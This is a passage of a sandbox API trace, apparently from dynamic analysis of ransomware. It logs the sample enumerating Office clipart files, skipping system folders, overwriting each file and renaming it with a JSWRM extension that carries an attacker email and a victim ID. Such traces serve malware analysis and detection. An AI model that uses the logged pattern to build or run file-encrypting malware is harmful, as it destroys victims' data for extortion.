returned 0x247c78 [0084.760] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0084.761] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0084.761] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152698.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152698.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152698.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152698.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0084.762] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0084.762] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0084.762] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0084.762] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe9e4dce, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe9e4dce, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xea574b2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4b8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0152702.WMF", cAlternateFileName="")) returned 1 [0084.762] lstrcmpiW (lpString1="J0152702.WMF", lpString2=".") returned 1 [0084.762] lstrcmpiW (lpString1="J0152702.WMF", lpString2="..") returned 1 [0084.762] lstrcmpiW (lpString1="J0152702.WMF", lpString2="...") returned 1 [0084.762] lstrcmpiW (lpString1="J0152702.WMF", lpString2="windows") returned -1 [0084.762] lstrcmpiW (lpString1="J0152702.WMF", lpString2="recovery") returned -1 [0084.762] lstrcmpiW (lpString1="J0152702.WMF", lpString2="perflogs") returned -1 [0084.762] lstrcmpiW (lpString1="J0152702.WMF", lpString2="documents and settings") returned 1 [0084.762] lstrcmpiW (lpString1="J0152702.WMF", lpString2="$RECYCLE.BIN") returned 1 [0084.762] lstrcmpiW (lpString1="J0152702.WMF", lpString2="system volume information") returned -1 [0084.762] lstrcmpiW (lpString1="J0152702.WMF", lpString2="msocache") returned -1 [0084.762] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0084.762] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152702.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0084.762] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152702.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0152702.WMF", lpUsedDefaultChar=0x0) returned 12 [0084.762] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0084.762] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0084.762] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152702.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0084.762] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152702.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0152702.WMF", lpUsedDefaultChar=0x0) returned 12 [0084.762] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0084.762] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0084.762] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0084.762] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0084.762] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0084.762] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0084.762] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152702.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152702.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0084.764] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1208) returned 1 [0084.764] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0084.764] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4b0) returned 0x230a00 [0084.764] ReadFile (in: hFile=0x314, lpBuffer=0x230a00, nNumberOfBytesToRead=0x4b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesRead=0x345e89c*=0x4b0, lpOverlapped=0x0) returned 1 [0084.787] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0084.787] WriteFile (in: hFile=0x314, lpBuffer=0x230a00*, nNumberOfBytesToWrite=0x4b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesWritten=0x345e898*=0x4b0, lpOverlapped=0x0) returned 1 [0084.787] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x230a00 | out: hHeap=0x1e0000) returned 1 [0084.787] CloseHandle (hObject=0x314) returned 1 [0084.787] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0084.787] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0084.787] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0084.787] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0084.787] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0084.787] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0084.787] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0084.787] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0084.787] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0084.787] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0084.787] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0084.787] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0084.787] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0084.787] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0084.787] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152702.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152702.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152702.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152702.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0084.788] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0084.788] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0084.788] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0084.788] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe9726d1, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe9726d1, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xea574b2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x674, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0152704.WMF", cAlternateFileName="")) returned 1 [0084.788] lstrcmpiW (lpString1="J0152704.WMF", lpString2=".") returned 1 [0084.788] lstrcmpiW (lpString1="J0152704.WMF", lpString2="..") returned 1 [0084.789] lstrcmpiW (lpString1="J0152704.WMF", lpString2="...") returned 1 [0084.789] lstrcmpiW (lpString1="J0152704.WMF", lpString2="windows") returned -1 [0084.789] lstrcmpiW (lpString1="J0152704.WMF", lpString2="recovery") returned -1 [0084.789] lstrcmpiW (lpString1="J0152704.WMF", lpString2="perflogs") returned -1 [0084.789] lstrcmpiW (lpString1="J0152704.WMF", lpString2="documents and settings") returned 1 [0084.789] lstrcmpiW (lpString1="J0152704.WMF", lpString2="$RECYCLE.BIN") returned 1 [0084.789] lstrcmpiW (lpString1="J0152704.WMF", lpString2="system volume information") returned -1 [0084.789] lstrcmpiW (lpString1="J0152704.WMF", lpString2="msocache") returned -1 [0084.789] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0084.789] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152704.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0084.789] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152704.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0152704.WMF", lpUsedDefaultChar=0x0) returned 12 [0084.789] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0084.789] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0084.789] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152704.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0084.789] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152704.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0152704.WMF", lpUsedDefaultChar=0x0) returned 12 [0084.789] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0084.789] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0084.789] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0084.789] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0084.789] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0084.789] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0084.789] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152704.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152704.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0084.790] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1652) returned 1 [0084.790] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0084.790] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x670) returned 0x22d530 [0084.790] ReadFile (in: hFile=0x314, lpBuffer=0x22d530, nNumberOfBytesToRead=0x670, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x22d530*, lpNumberOfBytesRead=0x345e89c*=0x670, lpOverlapped=0x0) returned 1 [0084.837] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0084.837] WriteFile (in: hFile=0x314, lpBuffer=0x22d530*, nNumberOfBytesToWrite=0x670, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x22d530*, lpNumberOfBytesWritten=0x345e898*=0x670, lpOverlapped=0x0) returned 1 [0084.837] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d530 | out: hHeap=0x1e0000) returned 1 [0084.837] CloseHandle (hObject=0x314) returned 1 [0084.838] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0084.838] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0084.838] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0084.838] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0084.838] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0084.838] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0084.838] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0084.838] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0084.838] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0084.838] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0084.838] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0084.838] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0084.838] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0084.838] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0084.838] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152704.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152704.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152704.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152704.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0084.839] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0084.840] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0084.840] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0084.840] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe9261f7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe9261f7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe9726d1, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x132c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0152708.WMF", cAlternateFileName="")) returned 1 [0084.840] lstrcmpiW (lpString1="J0152708.WMF", lpString2=".") returned 1 [0084.840] lstrcmpiW (lpString1="J0152708.WMF", lpString2="..") returned 1 [0084.840] lstrcmpiW (lpString1="J0152708.WMF", lpString2="...") returned 1 [0084.840] lstrcmpiW (lpString1="J0152708.WMF", lpString2="windows") returned -1 [0084.840] lstrcmpiW (lpString1="J0152708.WMF", lpString2="recovery") returned -1 [0084.840] lstrcmpiW (lpString1="J0152708.WMF", lpString2="perflogs") returned -1 [0084.840] lstrcmpiW (lpString1="J0152708.WMF", lpString2="documents and settings") returned 1 [0084.840] lstrcmpiW (lpString1="J0152708.WMF", lpString2="$RECYCLE.BIN") returned 1 [0084.840] lstrcmpiW (lpString1="J0152708.WMF", lpString2="system volume information") returned -1 [0084.840] lstrcmpiW (lpString1="J0152708.WMF", lpString2="msocache") returned -1 [0084.840] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0084.840] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152708.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0084.840] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152708.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0152708.WMF", lpUsedDefaultChar=0x0) returned 12 [0084.840] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0084.840] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0084.840] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152708.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0084.840] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152708.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0152708.WMF", lpUsedDefaultChar=0x0) returned 12 [0084.840] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0084.840] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0084.840] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0084.840] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0084.840] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0084.840] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0084.840] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152708.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152708.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0084.841] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4908) returned 1 [0084.841] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0084.841] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1320) returned 0x205850 [0084.841] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1320, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1320, lpOverlapped=0x0) returned 1 [0084.844] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0084.844] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1320, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1320, lpOverlapped=0x0) returned 1 [0084.844] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0084.844] CloseHandle (hObject=0x314) returned 1 [0084.844] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2106b0 [0084.844] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0084.844] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0084.844] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0084.844] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0084.844] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0084.844] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0084.844] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0084.844] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0084.844] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0084.844] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0084.844] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0084.844] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0084.844] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0084.845] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152708.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152708.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152708.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152708.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0084.845] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0084.845] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2106b0 | out: hHeap=0x1e0000) returned 1 [0084.845] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0084.845] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe998993, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe998993, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xea574b2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x11e4, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0152716.WMF", cAlternateFileName="")) returned 1 [0084.845] lstrcmpiW (lpString1="J0152716.WMF", lpString2=".") returned 1 [0084.846] lstrcmpiW (lpString1="J0152716.WMF", lpString2="..") returned 1 [0084.846] lstrcmpiW (lpString1="J0152716.WMF", lpString2="...") returned 1 [0084.846] lstrcmpiW (lpString1="J0152716.WMF", lpString2="windows") returned -1 [0084.846] lstrcmpiW (lpString1="J0152716.WMF", lpString2="recovery") returned -1 [0084.846] lstrcmpiW (lpString1="J0152716.WMF", lpString2="perflogs") returned -1 [0084.846] lstrcmpiW (lpString1="J0152716.WMF", lpString2="documents and settings") returned 1 [0084.846] lstrcmpiW (lpString1="J0152716.WMF", lpString2="$RECYCLE.BIN") returned 1 [0084.846] lstrcmpiW 